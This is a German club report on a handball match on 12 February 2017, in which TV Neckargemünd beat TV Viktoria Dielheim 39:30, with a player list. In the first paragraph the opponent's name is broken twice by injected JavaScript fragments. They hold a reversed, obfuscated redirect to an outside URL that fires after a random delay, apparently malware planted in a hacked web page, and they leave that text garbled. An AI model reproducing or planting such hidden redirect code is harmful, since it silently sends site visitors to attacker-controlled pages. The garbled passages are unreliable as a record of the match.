Für rund 8 Minuten ging der TV Viktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria Dielheim in Führung bis der Gleichstand bei einem 5:5 erreicht war. Dann hatte der TVN die Taktik des Gegners erfasst und legte los. Bis zum Schluss dominierte danach der TVN den Punktestand. (TVN – TV Viktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria Dielheim 39 : 30 (19 : 15))
Neckargemünd, den 12.02.2017 (ama) – Kurz nach dem Anpfiff schien es zunächst, als ob die Dielheimer das Spiel für sich entscheiden könnten. Der TVN musste sich jedoch erst auf die gegnerischen Spieler einstellen. Insbesondere auf die beiden sehr präsenten und körperlich starken Spieler mit den Nummern 10 und 11. Man reagierte schließlich abwehrtechnisch darauf und das Spiel gewann immer mehr an Souveränität zugunsten des TVN.
Der TVN zeigte sich voller Teamgeist und die Anweisungen des Trainers führten zu einem überaus intelligenten Spielemodus. Selbst bei temporärem Spiel mit nur 5 Spielern wegen 2-Minuten-Strafen zeigte der TVN eine überzeugende Spielstärke.
In der ersten Halbzeit waren bereits 4 Punkte Vorsprung herausgespielt. Und in der zweiten Halbzeit wurden nochmals 5 Punkte mehr zum finalen 39:30 erspielt. Ein echtes Sonntagsspiel also, bei dem man voller Freude zuschauen konnte. Ohne ständiges Bangen und ohne ständigen Adrenalinstress. Sehr gut gemacht! Auch die Anzahl der beim Spiel anwesenden Spieler ist sehr löblich zu erwähnen! Weiter so!
Es spielten:
Niklas und Tobias im Tor, Jordi (9), Felix (8), Emil (4), Hauke (4), Timothy (3), Till (3), Johannes (2), Nicolas (2), Sebastian (2), Philipp (1), Samuel (1)